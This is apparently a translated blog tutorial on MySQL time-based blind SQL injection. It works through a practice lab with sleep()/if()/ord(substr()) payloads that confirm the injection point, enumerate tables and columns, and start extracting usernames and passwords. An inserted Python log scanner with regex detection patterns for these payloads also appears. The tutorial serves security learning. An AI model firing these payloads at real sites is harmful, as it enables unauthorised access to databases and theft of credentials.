MySQL Injection - Blind Injection - Time-Based Blind Injection

#Time-based blind injection

Time-based blind injection:

The web page always returns its normal content. Differences in page response time are used to infer, step by step, whether an injection point exists and what the data is.

Scenarios in which it is used:

1. The page does not echo query results

2. The page shows no error messages

3. The page has no distinguishable true and false states

For example: if a page echoes query results, union injection is preferred. If there is no echo but there is an error message, error-based injection is used (extractvalue, floor, updatexml, etc.). If there is neither echo nor error message, but the page switches between two states (true and false) depending on the input, Boolean blind injection can be chosen based on that feedback. If none of the above apply, time-based injection can be used.

#Key function introduction

1. Sleep()

The parameter of sleep() is the sleep time in seconds; it can be a decimal.

First, request the parameter ?id=1

The page is normal.

Append random garbage after it; the page is still normal.

No matter what is written, the page stays normal. In practice the usual closing-quote checks and other probes are tried, and the page is normal regardless.

At this point we do not know whether there is an injection point, so we can only try the possibilities one by one.


Numeric type: try using sleep()

url: ?id=1 and sleep(5)

Assuming the parameter is numeric, we first use and sleep(5). If the page is returned only after 5 seconds, that proves the parameter is numeric and injectable, because the database executed what we typed.

It can be seen from the page that the result was not delayed by 5 seconds.

String type: try using sleep()

String, first try with "

url: ?id=1" and sleep(5) --+

No delay.

String, second try with '

url: ?id=1' and sleep(5) --+

The page returned in 6038 milliseconds.

About 1000 milliseconds of that is our own network latency.

After the 5-second delay, it is determined that there is an injection point.

This means the statement we entered was executed, which is how the existence of a SQL injection point is judged.

2. IF() function

IF(condition, true_value, false_value): condition is the condition, true_value is returned when the condition is true, and false_value is returned when the condition is false.

select if(1,2,3);
select if(1=1,sleep(0),sleep(3));
If the condition 1=1 is true, sleep(0) is executed; if 1=1 is false, sleep(3) is executed.

The first parameter is a comparison. In Boolean blind injection we use such comparisons to switch the page between its true and false states and so judge whether our condition holds. Here the page has no such states, so we can only use

the response time of the sleep() function to judge whether our condition is true.
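Since the only observable signal in this technique is response time, a defender looks for the same two things the attacker relies on: the delay primitive in the request and the matching stall in the response. The following is an added example, not code from the original post; it assumes a constructed access-log format with a response-time column in milliseconds and a baseline page load of about 1000 ms, as in the measurements above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original post). Assumed
# format: "<client> <method> <path?query> <status> <response_ms>".
SAMPLE_LOG = """\
10.0.0.5 GET /index.php?id=1 200 1012
10.0.0.5 GET /index.php?id=1%27%20and%20sleep(5)%20--%2B 200 6038
10.0.0.5 GET /index.php?id=1%27%20and%20if(length(database())%3E%3D10,sleep(0),sleep(3))%20--%2B 200 4021
10.0.0.5 GET /index.php?id=1%27%20and%20if(length(database())%3D8,sleep(0),sleep(3))%20--%2B 200 1031
10.0.0.7 GET /index.php?id=2 200 998
"""

# Delay primitive used in the post (sleep) plus benchmark(), MySQL's other timing primitive.
DELAY_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)
SLEEP_ARG_RE = re.compile(r"\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)
# Helpers that turn the delay into a per-character oracle (if/ord/substr/length/group_concat).
ORACLE_RE = re.compile(r"\b(?:if|ord|ascii|substr|substring|length|group_concat)\s*\(", re.I)


def analyze_line(line, baseline_ms=1000.0):
    """Return a finding for one log line, or None when no delay primitive is present."""
    client, _method, target, _status, resp_ms = line.split()
    query = unquote_plus(target.partition("?")[2])   # decode %27, %20, %2B, ... before matching
    if not DELAY_RE.search(query):
        return None
    # The largest sleep() argument is the delay the sender expects on the "false" branch.
    max_sleep = max((float(s) for s in SLEEP_ARG_RE.findall(query)), default=0.0)
    extra_ms = float(resp_ms) - baseline_ms          # time beyond the normal page load
    return {
        "client": client,
        "max_sleep_s": max_sleep,
        # True when the server actually stalled for (most of) the requested delay:
        # the injected query was executed, i.e. the parameter is injectable.
        "delay_observed": max_sleep > 0 and extra_ms >= 0.8 * max_sleep * 1000,
        # True for the if(...)/ord(substr(...)) form used to read data one character at
        # a time; these hits matter even when no delay occurred (the sleep(0) branch).
        "enumeration": bool(ORACLE_RE.search(query)),
        "decoded_query": query,
    }


def scan(log_text, baseline_ms=1000.0):
    """Run analyze_line over every non-empty line and keep the findings."""
    results = (analyze_line(l, baseline_ms) for l in log_text.splitlines() if l.strip())
    return [f for f in results if f]
```

Apache's %D (microseconds) or nginx's $request_time (seconds) can supply the response-time column after unit conversion; the decoded query is checked because the quote, spaces and --+ arrive URL-encoded.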

#Case demo

1. Determine whether the parameter is numeric or a string. If it is a string, determine the closing method, and determine whether there is an injection point.

payload:

and sleep(5);

url: ?id=1' and sleep(5) --+

After the 5-second delay, it is determined that there is an injection point.

The parameter is closed with ' single quotes.

2. Determine the length of the database name

payload:

and if(length(database())>=10,sleep(0),sleep(3))

Functions used:

length(): string length

database(): the database currently in use

url: ?id=1' and if(length(database())>=10,sleep(0),sleep(3)) --+

Determine whether the length of the database name is greater than or equal to 10 characters. If it is, the result is returned after 0 seconds; if it is not, the result is returned after 3 seconds.

The page paused for 3 seconds, indicating the length is less than 10, so the database name is within 10 characters.

url:

?id=1' and if(length(database())=8,sleep(0),sleep(3)) --+

The page responded in 1031 milliseconds with no delay, confirming that the database name is 8 characters.

3. Determine the database name

payload:

and if(ord(substr(database(),1,1))>=x,sleep(0),sleep(3))

Functions used:

if(1,2,3): conditional statement; 1 is the condition. If the condition is true, parameter 2 is executed; if 1 is false, parameter 3 is executed.

ord(): converts the content in brackets into its ASCII code

substr(s,n,1): takes the string s starting from position n for a length of one character

Determine the first character of the database name

url: ?id=1' and if(ord(substr(database(),1,1))>=100,sleep(0),sleep(3)) --+

Take the first character of the database name and judge whether its ASCII value is greater than or equal to 100. If it is, the page pauses for 0 seconds and returns.

Judged by the page load time: greater than 100

Judged by the page load time: greater than 110

.......

Judged by the page time, the ASCII code of the first character is 115

Compared with the ASCII table:

115 = s

Conclusion: the first character is s

Determine the second character of the database name

?id=1' and if(ord(substr(database(),2,1))=101,sleep(0),sleep(3)) --+

Judged by the timing, the ASCII code of the second character is 101

Compared with the ASCII table:

101 = e

Conclusion: the second character is e

....... Try the remaining characters yourself; just change the second parameter of substr()

The database name is finally determined to be security

4. Obtain data table information

4.1 Get the length of the string of all table names concatenated

payload:

and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>=x,sleep(0),sleep(3))

url:

?id=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=29,sleep(0),sleep(3)) --+

Determine whether the string length of the concatenated table names is 29

Judged by the time response, the concatenated table names are 29 characters

4.2 Guess each character of the concatenated table-name string

payload:

and if(ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),n,1))>=x,sleep(0),sleep(3))

Query the first character of the table-name string

url:

?id=1' and if(ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>=110,sleep(0),sleep(3)) --+

Determine whether the first character of the table-name string is greater than 110

Judged by the response time: not greater than 110

url:

?id=1' and if(ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>=100,sleep(0),sleep(3)) --+

Determine whether the first character of the table-name string is greater than 100

Judged by the difference in page response time, it is greater than 100 and less than 110, so it lies between 100 and 110

url:

?id=1' and if(ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=101,sleep(0),sleep(3)) --+

Judged by the time response, the ASCII value of the first character of the table-name string is 101

Looked up in the ASCII table:

101 converts to e

So the first character of the table-name string is e

Query the second character of the table-name string

?id=1' and if(ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),2,1))>100,sleep(0),sleep(3)) --+

Determine whether the second character of the table-name string is greater than 100

Judged by the time difference, it is greater than 100

url:

?id=1' and if(ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),2,1))>=110,sleep(0),sleep(3)) --+

Judged by the response time, it is not greater than 110

So the second character is between 100 and 110

Test one by one from 100 to 110

url:

?id=1' and if(ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),2,1))=109,sleep(0),sleep(3)) --+

Judged by the time response, the ASCII value of the second character of the table-name string is 109

Looked up in the ASCII table:

109 converts to m

So the second character of the table-name string is m

....................

The same steps apply; just replace the second parameter of substr()

The final list of tables is:

emails, referers, uagents, users


5. Query all field information in the users table

5.1 Get the length of the string of all field names concatenated

payload:

and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>=n,sleep(0),sleep(3))

url:

?id=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>=20,sleep(0),sleep(3)) --+

Determine whether the concatenated field names are greater than 20 characters

Judged by the page timing, it is confirmed to be greater than 20 characters

url:

?id=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>=30,sleep(0),sleep(3)) --+

Judged by the page time response, the number of characters is not greater than 30

So the field-name string is between 20 and 30 characters

url:

?id=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))=20,sleep(0),sleep(3)) --+

Judged by the page time difference, the field-name string is 20 characters long

5.2 Guess each character of the concatenated field-name string

payload:

and if(ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='数据表'),n,1))>=x,sleep(0),sleep(3))

?id=1' and if(ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>=110,sleep(0),sleep(3)) --+

Determine whether the first character of the concatenated field names is greater than 110

Judged by the page time difference, not greater than 110

url:

?id=1' and if(ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>=100,sleep(0),sleep(3)) --+

Judged by the page time difference, the first character is greater than 100 but less than 110

Between 100 and 110

url:

?id=1' and if(ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))=105,sleep(0),sleep(3)) --+

Judged by the time response, the first character is 105

Compared with the ASCII table:

105 = i

............

The same test method applies for the rest; just change the second parameter of substr()

All fields are:

id, username, password

6. Dumping the data

1. Determine the length of the data (the total length of the username and password fields concatenated into one string)

payload:

?id=1' and if(LENGTH((SELECT GROUP_CONCAT(field 1,'--',field 2) FROM database.table))>=x,sleep(0),sleep(3))

?id=1' and if(LENGTH((SELECT GROUP_CONCAT(username,'--',password) FROM security.users))=201,sleep(0),sleep(3)) --+

Judged by the response time, the concatenated field data is 201 characters long

2. Guess each character of the data in the fields

payload:

and if(ORD(SUBSTR((SELECT GROUP_CONCAT(field 1,'--',field 2) FROM database.table),n,1))>=x,sleep(0),sleep(3))

?id=1' and if(ORD(SUBSTR((SELECT GROUP_CONCAT(username,'--',password) FROM security.users),1,1))=68,sleep(0),sleep(3)) --+

Judged by the response time, the ASCII code of the first character is 68

68 = D

.................................................................

The rest is judged the same way. There are too many characters and I don't want to test them all; if anyone is curious enough, run sqlmap on it.


Source: blog.csdn.net/m0_72755466/article/details/129828796